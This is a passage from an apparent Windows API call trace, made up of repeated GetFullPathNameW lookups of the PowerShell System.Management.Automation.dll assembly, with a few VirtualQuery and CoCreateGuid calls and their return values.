lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.514] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xc59fd183, Data2=0xc4b0, Data3=0x4cb6, Data4=([0]=0xbd, [1]=0x4f, [2]=0x2b, [3]=0x57, [4]=0x83, [5]=0x81, [6]=0xb5, [7]=0x67))) returned 0x0 [0085.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.516] VirtualQuery (in: lpAddress=0xeb1b0, lpBuffer=0xec070, dwLength=0x30 | out: lpBuffer=0xec070*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.516] VirtualQuery (in: lpAddress=0xeb1b0, lpBuffer=0xec070, dwLength=0x30 | out: lpBuffer=0xec070*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.516] VirtualQuery (in: lpAddress=0xeb240, lpBuffer=0xec100, dwLength=0x30 | out: lpBuffer=0xec100*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeb970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeb8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeb8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.517] VirtualQuery (in: lpAddress=0xeb1b0, lpBuffer=0xec070, dwLength=0x30 | out: lpBuffer=0xec070*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.517] VirtualQuery (in: lpAddress=0xeb240, lpBuffer=0xec100, dwLength=0x30 | out: lpBuffer=0xec100*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeb970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeb8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeb8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.517] VirtualQuery (in: lpAddress=0xeb1b0, lpBuffer=0xec070, dwLength=0x30 | out: lpBuffer=0xec070*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.518] VirtualQuery (in: lpAddress=0xeb240, lpBuffer=0xec100, dwLength=0x30 | out: lpBuffer=0xec100*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeb970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeb8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeb8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.518] VirtualQuery (in: lpAddress=0xeb1b0, lpBuffer=0xec070, dwLength=0x30 | out: lpBuffer=0xec070*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.518] VirtualQuery (in: lpAddress=0xeb240, lpBuffer=0xec100, dwLength=0x30 | out: lpBuffer=0xec100*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.519] VirtualQuery (in: lpAddress=0xeb1b0, lpBuffer=0xec070, dwLength=0x30 | out: lpBuffer=0xec070*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.519] VirtualQuery (in: lpAddress=0xeb240, lpBuffer=0xec100, dwLength=0x30 | out: lpBuffer=0xec100*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeb970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeb8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeb8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.519] VirtualQuery (in: lpAddress=0xeb1b0, lpBuffer=0xec070, dwLength=0x30 | out: lpBuffer=0xec070*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.520] VirtualQuery (in: lpAddress=0xeb240, lpBuffer=0xec100, dwLength=0x30 | out: lpBuffer=0xec100*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeb970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeb8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeb8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.520] 